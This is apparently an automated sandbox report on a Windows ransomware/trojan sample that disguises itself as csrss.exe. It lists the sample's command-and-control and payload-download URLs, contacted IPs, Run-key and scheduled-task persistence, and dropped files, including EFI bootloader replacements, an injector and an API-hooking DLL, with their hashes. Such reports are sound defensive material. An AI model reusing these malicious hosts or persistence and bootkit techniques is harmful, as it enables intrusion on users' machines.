http://www.exabot.com/go/robot)Opera/9.80	csrss.exe	false	URL Reputation: safe	unknown
http://www.bingmapsportal.com	svchost.exe, 00000008.00000002.312836660.00000168B0C13000.00000004.00000001.sdmp	false		high
https://server3.trumops.comserver3.trumops.com:443server3.trumops.com:443tcpserver3.trumops.com	csrss.exe, 00000011.00000003.380425564.00000000169E8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://server3.trumops.comserver3.trumops.com:443server3.trumops.com:443tcpserver3.trumops.comT	csrss.exe, 00000011.00000002.561078714.0000000016A88000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.379621696.0000000016A86000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 00000008.00000003.312103721.00000168B0C41000.00000004.00000001.sdmp	false		high
https://trumops.comhttps://retoti.com	csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 00000008.00000002.312879407.00000168B0C3E000.00000004.00000001.sdmp	false		high
https://trumops.com/api/install-failureinvalid	csrss.exe	false	Avira URL Cloud: safe	unknown
http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4	1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	false		high
http://yandex.com/bots)Opera/9.51	csrss.exe	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 00000008.00000002.312879407.00000168B0C3E000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.312836660.00000168B0C13000.00000004.00000001.sdmp	false		high
https://%s.xboxlive.com	svchost.exe, 00000005.00000002.550174862.000001B888243000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000008.00000003.290110076.00000168B0C32000.00000004.00000001.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen.virtua	svchost.exe, 00000008.00000002.312836660.00000168B0C13000.00000004.00000001.sdmp	false		high
http://https://_bad_pdb_file.pdb	1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp	false	Avira URL Cloud: safe	low
http://www.bloglines.com)F	csrss.exe	false	Avira URL Cloud: safe	low
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmp	false		high
https://dynamic.t	svchost.exe, 00000008.00000002.312895544.00000168B0C53000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.312884679.00000168B0C43000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://newscommer.com/app/app.exe	csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	true	URL Reputation: malware	unknown
http://www.google.com/feedfetcher.html)HKLM	csrss.exe	false		high
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmp	false		high
https://blockchain.infoindex	csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	false	URL Reputation: safe	unknown
https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 00000008.00000002.312858607.00000168B0C29000.00000004.00000001.sdmp	false		high
http://www.avantbrowser.com)MOT-V9mm/00.62	csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	false	Avira URL Cloud: safe	low
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmp	false		high
http://search.msn.com/msnbot.htm)pkcs7:	1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	false		high
http://www.alexa.com/help/webmasters;	csrss.exe	false		high
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 00000008.00000003.312062556.00000168B0C4A000.00000004.00000001.sdmp	false		high
https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta	1dyvctHqv1.exe, 00000000.00000002.302722905.00000000160C4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125563209-4053062332-1002	csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 00000008.00000002.312879407.00000168B0C3E000.00000004.00000001.sdmp	false		high
http://gais.cs.ccu.edu.tw/robot.php)Gulper	csrss.exe	false	Avira URL Cloud: safe	unknown
http://gohnot.com/546468561c5f48a95f3eb178d8283c2e/watchdog.exeH	csrss.exe, 00000011.00000003.379401154.0000000016ACC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.spidersoft.com)Wget/1.9	csrss.exe	false	Avira URL Cloud: safe	low
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 00000008.00000002.312884679.00000168B0C43000.00000004.00000001.sdmp	false		high
https://retoti.com	1dyvctHqv1.exe, 00000000.00000002.302722905.00000000160C4000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.412194328.00000000168BC000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.421794199.0000000016852000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.420984157.0000000016810000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://trumops.comif-unmodified-sinceillegal	1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 00000008.00000002.312858607.00000168B0C29000.00000004.00000001.sdmp	false		high
http://devlog.gregarius.net/docs/ua)Links	csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	false	URL Reputation: safe	unknown
https://server3.trumops.com	csrss.exe, 00000011.00000002.561078714.0000000016A88000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://grub.org)Mozilla/5.0	csrss.exe	false	Avira URL Cloud: safe	low
http://www.everyfeed.c	csrss.exe	false	Avira URL Cloud: safe	unknown
https://turnitin.com/robot/crawlerinfo.html)gentraceback	csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	false		high
https://trumops.com	1dyvctHqv1.exe, 00000000.00000002.302722905.00000000160C4000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.559317775.0000000016838000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.412194328.00000000168BC000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.421794199.0000000016852000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.420984157.0000000016810000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://server3.trumops.com/api/pollserver3.trumops.com	csrss.exe, 00000011.00000003.381350341.0000000016910000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 00000008.00000002.312879407.00000168B0C3E000.00000004.00000001.sdmp	false		high
http://www.googlebot.com/bot.html)Links	csrss.exe	false	URL Reputation: safe	unknown
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmp	false		high
http://search.msn.com/msnbot.htm)net/http:	csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	false		high
https://runmodes.com/api/log3633e481-2f88-4842-b7ba-c5d7e0cc011f.uuid.trumops.com	csrss.exe, 00000011.00000003.381724707.00000000168AC000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://server3.trumops.com/api/poll62	csrss.exe, 00000011.00000002.560072123.00000000168E6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.msn.com/msnbot.htm)msnbot/1.1	csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 00000008.00000003.290110076.00000168B0C32000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmp	false		high
http://www.archive.org/details/archive.org_bot)Opera/9.80	csrss.exe	false		high
http://www.google.com/bot.html)Mozilla/5.0	csrss.exe	false		high
https://server3.trumops.com3server3.trumops.com:443server3.trumops.com:443ontcpserver3.trumops.com	csrss.exe, 00000011.00000002.560806655.00000000169E8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000008.00000002.312895544.00000168B0C53000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmp	false		high
http://archive.org/details/archive.org_bot)Mozilla/5.0	csrss.exe	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmp	false		high
https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDDelegateExecuteC:	csrss.exe, 00000021.00000002.421794199.0000000016852000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://misc.yahoo.com.cn/he	csrss.exe	false	Avira URL Cloud: safe	unknown
http://crl.g	1dyvctHqv1.exe, 00000000.00000002.298174176.0000000004BC5000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.326226271.0000000004D87000.00000040.00000001.sdmp, csrss.exe, 00000011.00000002.554922240.0000000005200000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000002.408273398.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000021.00000002.406886356.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.406346781.0000000005200000.00000040.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.baidu.com/search/spide	csrss.exe	false		high
http://yandex.com/bots)Opera/9.80	csrss.exe	false		high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 00000008.00000003.290110076.00000168B0C32000.00000004.00000001.sdmp	false		high
https://sitescore.aiValue	csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com	svchost.exe, 00000005.00000002.550174862.000001B888243000.00000004.00000001.sdmp	false		high
http://www.google.com/adsbot.html)Encountered	csrss.exe	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmp	false		high
https://%s.dnet.xboxlive.com	svchost.exe, 00000005.00000002.550174862.000001B888243000.00000004.00000001.sdmp	false	URL Reputation: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.139.144	server3.trumops.com	United States	13335	CLOUDFLARENETUS	false
104.21.34.203	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.207.136	runmodes.com	United States	13335	CLOUDFLARENETUS	false
172.67.196.11	gohnot.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	520213
Start date:	11.11.2021
Start time:	20:34:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	1dyvctHqv1 (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	53
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@78/18@12/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 96.7% (good quality ratio 50%) Quality average: 39.2% Quality standard deviation: 43.3%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, consent.exe, backgroundTaskHost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.35.236.56, 184.30.21.144 Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing behavior and disassembly information. Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:35:07	API Interceptor	9x Sleep call for process: 1dyvctHqv1.exe modified
20:35:24	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run EmptySmoke "C:\Windows\rss\csrss.exe"
20:35:28	API Interceptor	9x Sleep call for process: csrss.exe modified
20:35:31	Task Scheduler	Run new task: csrss path: C:\Windows\rss\csrss.exe
20:35:32	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run EmptySmoke "C:\Windows\rss\csrss.exe"

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

B:\EFI\Boot\old.efi (copy) Download File
Process:	C:\Windows\rss\csrss.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	7680
Entropy (8bit):	4.486535052248291
Encrypted:	false
SSDEEP:	48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
MD5:	17ACB515B5FA45DEF030B191E5BC7991
SHA1:	539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
SHA-256:	9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
SHA-512:	5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................

B:\EFI\Microsoft\Boot\fw.efi (copy) Download File
Process:	C:\Windows\rss\csrss.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	7680
Entropy (8bit):	4.486535052248291
Encrypted:	false
SSDEEP:	48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
MD5:	17ACB515B5FA45DEF030B191E5BC7991
SHA1:	539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
SHA-256:	9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
SHA-512:	5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................

C:\EFI\Boot\EfiGuardDxe.efi Download File
Process:	C:\Windows\rss\csrss.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	279552
Entropy (8bit):	4.553173975914215
Encrypted:	false
SSDEEP:	3072:ekODsOuozgl9aXsRzZZZZrUhFapDL4k2yntc:ekeklesRD6yt
MD5:	2B84CB96AE6280C2020FA46E4A8A07D8
SHA1:	E920E40CFC0C6A805D657C8F23F9C0612CD39F59
SHA-256:	01E86A4DFE6E0DE7857B3CF2FAFD041C8B3A3241E00844CB6BFBD3BFAE2D36BC
SHA-512:	F1A6598116F78FBA1F9531301A7313AC204BAB3B7AEBC299F69F2ED406F4EDAFC3410DB860E93D0DC7C24398F5A7FF595764400F31A3A06679FD6EC0EFB116D9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ..............................................................................................................................................................................................PE..d................." ................x........................................................................................................................P...............p.......................................................................................text.............................. ..h.data..............................@....pdata.......P.......8..............@..H.xdata..X....`.......<..............@..B.reloc.......p.......B..............@..B........................................................................................................................................................................................................................................................................................................................................................

C:\EFI\Boot\bootx64.efi Download File
Process:	C:\Windows\rss\csrss.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	7680
Entropy (8bit):	4.486535052248291
Encrypted:	false
SSDEEP:	48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
MD5:	17ACB515B5FA45DEF030B191E5BC7991
SHA1:	539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
SHA-256:	9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
SHA-512:	5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................

C:\EFI\Microsoft\Boot\bootmgfw.efi Download File
Process:	C:\Windows\rss\csrss.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	7680
Entropy (8bit):	4.486535052248291
Encrypted:	false
SSDEEP:	48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
MD5:	17ACB515B5FA45DEF030B191E5BC7991
SHA1:	539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
SHA-256:	9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
SHA-512:	5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.10988191430411122
Encrypted:	false
SSDEEP:	12:26wtzXm/Ey6q99957WHrNq3qQ10nMCldimE8eawHjchv:26zl680rgLyMCldzE9BHjcZ
MD5:	B9C1230DB14496DE6055D5B6E9395E4A
SHA1:	F4933EDEDCD7E32DB93E4DCF96B0714A5B8B1E16
SHA-256:	978DEAF640341549BBA60EA2CE13B308D8F309C5904AEA1F2D4765C5006EBF34
SHA-512:	04338F1EC0EEF0A12A1E829D9996DDE13192508FFA6F9ED121E1E4E606A8CD284E38FCE2C5CB396F2D4238CA72DC6B9BE97D1290DF495BB1CDBC6219EF687937
Malicious:	false
Reputation:	unknown
Preview:	................................................................................@...X....7.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................h.`...... ........~...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.@...X....?......................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11233272756144043
Encrypted:	false
SSDEEP:	12:60zXm/Ey6q99957R1miM3qQ10nMCldimE8eawHza1miIbCf:ml68D1tMLyMCldzE9BHza1tIG
MD5:	9F9B3B15512D21DE1F624BCCCBCF0F4F
SHA1:	DEA05AE8627BF2C6EDE583F509E165FAF68B6602
SHA-256:	AD26EEE8AA560B016F1437E44671E97EB333869C71E61525FB44F6DEEF5FF268
SHA-512:	D45CF8453A2BD24CAD37D59DF48981B60117C649F153D242668F47467C92C236902C6937E2B56CB9D47F2EA34B71FBEE8C9D9DA3F72E9010D99B9BDBE09613B1
Malicious:	false
Reputation:	unknown
Preview:	................................................................................@...X...........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................h.`...... ........~...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.@...X...+......................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11225190051937713
Encrypted:	false
SSDEEP:	12:izXm/Ey6q999579b71mK2P3qQ10nMCldimE8eawHza1mKKf:nl68f71iPLyMCldzE9BHza1W
MD5:	0650567BEB256DCD76B37081C6665CAB
SHA1:	BB72A9E9E7991547FA2A3240E271F72A16EDA5DC
SHA-256:	7B401C77E4C590753E912829E138AC04D29F8A73E485D3FB2E0E579215918014
SHA-512:	223A317C6C4ED1170FD137BFB2152FD2E44617601E60C4939844A5D93F7E2F5CD20335E54061DF7B49F3288A6C4582B6EE32B1F6AD6C347701D8621B0962822E
Malicious:	false
Reputation:	unknown
Preview:	................................................................................@...X...........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................h.`...... .........~...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.@...X..........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Download File
Process:	C:\Windows\rss\csrss.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	101376
Entropy (8bit):	5.951577458824018
Encrypted:	false
SSDEEP:	3072:U3JJpaHtGsxJZ7zmaUMf2ETb4w1GMYbuT:csTF5U3EfndT
MD5:	09031A062610D77D685C9934318B4170
SHA1:	880F744184E7774F3D14C1BB857E21CC7FE89A6D
SHA-256:	778BD69AF403DF3C4E074C31B3850D71BF0E64524BEA4272A802CA9520B379DD
SHA-512:	9A276E1F0F55D35F2BF38EB093464F7065BDD30A660E6D1C62EED5E76D1FB2201567B89D9AE65D2D89DC99B142159E36FB73BE8D5E08252A975D50544A7CDA27
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Metadefender, Detection: 46%, Browse Antivirus: ReversingLabs, Detection: 59%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b..............k......k......k..r...w......w......w......k............. w...... w...... w......Rich............PE..d...o.D`.........." ................$/....................................................`..................................................g..(...............p...............<....W..8...........................@W..8............................................text............................... ..`.rdata.............................@..@.data................d..............@....pdata..p............p..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..<...........................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Download File
Process:	C:\Windows\rss\csrss.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	6.31266455792162
Encrypted:	false
SSDEEP:	3072:qbHszDaOJ8u2HHFIWr6e29kOnK7qFQ8wMii5I7kGvNjzMuszHshoY46bEydJ+dK9:SA3IlIA6e29vngqS8wMmuooh8z+8F
MD5:	D98E33B66343E7C96158444127A117F6
SHA1:	BB716C5509A2BF345C6C1152F6E3E1452D39D50D
SHA-256:	5DE4E2B07A26102FE527606CE5DA1D5A4B938967C9D380A3C5FE86E2E34AAAF1
